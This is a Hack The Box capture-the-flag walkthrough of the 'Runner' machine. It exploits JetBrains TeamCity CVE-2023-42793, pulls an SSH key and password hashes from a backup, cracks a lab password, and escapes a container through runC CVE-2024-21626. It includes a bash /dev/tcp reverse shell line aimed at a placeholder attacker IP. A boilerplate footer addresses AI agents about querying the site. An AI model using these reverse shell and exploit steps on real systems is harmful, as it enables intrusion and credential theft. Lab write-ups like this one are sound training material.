> For the complete documentation index, see [llms.txt](https://cl4nd3st1ne.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cl4nd3st1ne.gitbook.io/write-ups/hack-the-box/machines/htb-season-5-runner-machine-walkthrough.md).

# HTB Season 5: Runner Machine Walkthrough

I ran Threader3000 first, which identified the ports 22,80 and 8000 as open. Following this, I ran an Nmap scan:

<figure><img src="/files/syTILBP2WqhZxc2QqzvN" alt=""><figcaption><p>Result of the Nmap scan</p></figcaption></figure>

The web server running on port 80:

<figure><img src="/files/HFB7sV3BHJdVFwbpvsIf" alt=""><figcaption><p>Landing Page</p></figcaption></figure>

Checking the source code and performing dirbusting revealed no leads. The sevice on port 8000 returned ‘Not found’ on visiting. So, the next thing I tried was looking for virtual hosts on `runner.htb` using `ffuf`. It took some time but I ultimately got something useful:

<figure><img src="/files/4sda5dJdTsbkgjExLcUr" alt=""><figcaption><p>Discovering a virtual host</p></figcaption></figure>

> TeamCity is a continuous integration (CI) server provided by JetBrains.

Here we had a login with the version of the service mentioned below:

<figure><img src="/files/5pAhJ2C97DiC0fv8fgd6" alt=""><figcaption><p>teamcity.runner.htb</p></figcaption></figure>

I tried default passwords even though I was almost certain it won’t work, but it’s best to be sure you tried everything. Next, knowing the version, I started looking for exploits.

> CVE-2023–42793: In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible.\
> Read more about this product and CVE [here](https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity).

***

Using this CVE, we could do two things — Either create an admin account of our own or use the existing admin account to obtain arbitrary code execution. I took the former route during the season after going down the RCE path and failing, but later I found the correct way of obtaining RCE, so I’ll be covering both approaches here.

#### **1. Creating an Additional Admin Account**

I found [this](https://github.com/H454NSec/CVE-2023-42793) public exploit, and it successfully created an admin account for our instance of TeamCity:

<figure><img src="/files/EJXejIqoKHMTp07pOcfZ" alt=""><figcaption></figcaption></figure>

After logging in, under the `Administration` tab there is an interesting feature — Backup. After performing one and downloading, I looked for interesting strings. From the Admin panel, we can also see other users like john who is the actual admin and matthew. I searched for those words in the backup:

<figure><img src="/files/jkvvJkvSjlvJBmQUHX1L" alt=""><figcaption><p>Credentials</p></figcaption></figure>

Wait, that’s not all.

<figure><img src="/files/1akKuljZQxsdze75KFD3" alt=""><figcaption><p>SSH Key</p></figcaption></figure>

There’s an SSH Private key. I was able to use it to log into john’s account and grab the first flag.

#### **2. Using the Admin Account for RCE**

In the [blog mentioned earlier](https://www.prio-n.com/blog/cve-2023-42793-attacking-defending-JetBrains-TeamCity), there are steps given to obtain an access token and execute code. I followed those and got here:

<figure><img src="/files/AWMiAQIe57z6lDVo7GRM" alt=""><figcaption><p>RCE</p></figcaption></figure>

The next thing to try was definitely obtaining a reverse shell. However, none of the reverse shells I injected worked. I believe there was an issue in the URL encoding, because even multi-word commands like `ls -al` were throwing error in my case.

I decided to research some more, and that’s when I found [this](https://packetstormsecurity.com/files/174860/JetBrains-TeamCity-Unauthenticated-Remote-Code-Execution.html) blog post which enlightened me that there’s [this Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb) for this CVE. Several hours later, I was still unable to get this module to run. Then I found just what I was looking for — an [exploit](https://github.com/hotplugin0x01/CVE-2023-42793/blob/main/exploit.py) in python and answers as to why my burp request hadn’t worked!

Turns out, for multi-word commands, we need to add the `params` parameter in addition to `exePath` to the request shown above. The exploit does the whole process for us; all I had to do was edit the reverse shell payload for a better shell, and I got a remote connection.

{% code overflow="wrap" %}

```
bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1
//replace attacker_ip and attacker_port
```

{% endcode %}

Then following a similar process as the first approach, we can look for interesting files and strings.

<figure><img src="/files/wDOyMJL0Lt0NFELutUiX" alt=""><figcaption><p>Finding the SSH Key from Reverse Shell</p></figcaption></figure>

***

Now, we move to privilege escalation.

Sending the LinPEAS script on the target and running it:

{% code overflow="wrap" %}

```
scp -i ./HTB/runner/TeamCity_Backup_20240603_155101/config/projects/AllProjects/pluginData/ssh_keys/id_rsa linpeas.sh john@runner.htb:~
```

{% endcode %}

Since the output is usually large, I save it in a text file to examine on my system. You need to be quick because the machine gets cleared in short intervals, deleting all downloaded files. Launch the LinPEAS script with the `-q` and `-N` flags to obtain a shorter, readable output.

There’s portainer on the system:

<figure><img src="/files/ZLa4CaQ8BY50udQcGJyH" alt=""><figcaption></figcaption></figure>

Search for that term and we have a lead:

<figure><img src="/files/1F0EABUvpdLdoiq2Y99Y" alt=""><figcaption><p>Finding another VHost on the system</p></figcaption></figure>

<figure><img src="/files/oxQTJL5LsrvGx2wF2knn" alt=""><figcaption></figcaption></figure>

> Portainer is a container management platform that can be used for deployment, efficient monitoring, and secure operations

First thing we need is credentials, and we do have 2 unused passwords from the TeamCity backup (check the screenshot) . I used john in bcrypt mode (we can see the format of the hash as bcrypt in the same screenshot) and was able to crack one of the hashes to obtain the password:

<figure><img src="/files/RoniS11wX3d5J68AWnRQ" alt=""><figcaption><p>Successful cracking of matthew’s password</p></figcaption></figure>

using `matthew:piper123`, we can successfully log into the Portainer dashboard. There are 2 images available — teamcity and ubuntu. After going through the basic functionalities of the dashboard, I looked up vulnerabilities for this version of Portainer but didn’t find anything for privilege escalation.

Then I started reading about container escaping, and tried to apply methods given in the HackTricks guide for the same. However, I wasn’t able to find a vector. I decided to refer to the official HTB Forum for a nudge, and from there I found [this](https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd) blog. It was about a specific version of `runC`.

> runC is a container runtime that provides a low-level interface for creating and running containers

On the system as john, I confirmed that we had the specific version of `runC` to apply the exploit:

<figure><img src="/files/Haze6H4Wy6bXGwUpoHFJ" alt=""><figcaption><p>Vulnerable Versions Range from v1.0.0-rc93 to 1.1.11, and ours is 1.1.7</p></figcaption></figure>

We can proceed with the exploitation steps. I created a container with the image ID of the teamcity image, and kept the working directory as instructed:

<figure><img src="/files/DBhJ6LEzJwP2qz9RlQaO" alt=""><figcaption></figcaption></figure>

Once the container was made and launched, I opened the console and moved to the root directory to get the final flag:

<figure><img src="/files/QFfMFntcYmixs1x5Mygo" alt=""><figcaption><p>Exploit in action</p></figcaption></figure>

Inspite of the error in finding the directory we specified, our command was executed successfully and we were able to break out of the container and access the filesystem. [This](https://medium.com/@sk3pper/play-with-cve-2024-21626-2b4377e9577f) is another article that I found very informative for understanding this vulnerability. It actually covers the scenario of this machine as well.

***

This was a very informative machine for me as it provided not just multiple CVEs but also several paths to exploit them. I have very limited experience with containers so it gave me an opportunity to learn about vulnerabilities in them and what to look out for.

Thanks for reading!

<mark style="color:$info;">\[Originally Published on Jul 27, 2024]</mark>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://cl4nd3st1ne.gitbook.io/write-ups/hack-the-box/machines/htb-season-5-runner-machine-walkthrough.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
